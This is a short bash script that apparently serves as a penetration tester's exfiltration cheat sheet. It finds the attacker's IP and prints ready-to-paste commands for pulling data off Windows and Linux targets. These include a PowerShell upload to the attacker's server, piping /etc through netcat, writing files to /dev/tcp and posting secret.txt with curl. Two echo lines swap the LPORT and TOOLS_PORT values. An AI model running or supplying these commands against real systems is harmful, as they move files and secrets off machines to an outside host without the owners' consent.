#!/bin/bash

TOOLS_PORT=9999

# Colors
GREEN='\033[0;32m' # Green
NC='\033[0m'       # No Color


# Make this work for local lab also
if ip -4 a show tun0 &> /dev/null; then
    LHOST=$(ip -4 a show tun0 | grep -Po 'inet \K[\d.]+')
else
    LHOST=$(ip -4 a show wlan0 | grep -Po 'inet \K[\d.]+')
fi


if [ $# -eq 0 ]
then
  LPORT=443
else
  LPORT=$1
fi

cat << "EOF"
  ______       __ _ _ 
 |  ____|     / _(_) |
 | |__  __  _| |_ _| |
 |  __| \ \/ /  _| | |
 | |____ >  <| | | | |
 |______/_/\_\_| |_|_|
                                                         
                                                                                                                         
EOF

# https://patorjk.com/software/taag/#p=display&f=Big&t=Exfil

echo -e "LHOST=${GREEN}$LHOST${NC}"
echo -e "LPORT=${GREEN}$TOOLS_PORT${NC}"
echo -e "TOOLS_PORT=${GREEN}$LPORT${NC}"
echo
echo "Start uploadserver"
echo "uploadserver 9999 --directory $PWD"
echo
echo
echo '********** Windows **********'
echo
echo "# WinPeas"
echo "iwr -Uri $LHOST:9999/upload -Method Post -Form @{file=Get-Item "file.txt";filename="file.txt"}"
echo
echo
echo '********** Linux **********'
echo
echo "base64 -w0 <file>"
echo "base64 -d file"
echo 
echo "Receiver"
echo "nc -l -p 7000 | tar x"
echo 
echo "Sender"
echo "tar cf - etc/ | nc -q 0 $LHOST 7000" 
echo
echo "nc -lvnp 80 > file"                       # Attacker machine
echo "cat /path/file > /dev/tcp/$LHOST/80"      # Target machine
echo
echo "curl -F \"files=@secret.txt\" http://$LHOST:9999/upload"
echo
echo "Sender:   cat file | nc $LHOST 1234"
echo "Receiver: nc -l -p 1234 -q 1 > file.ext < /dev/null"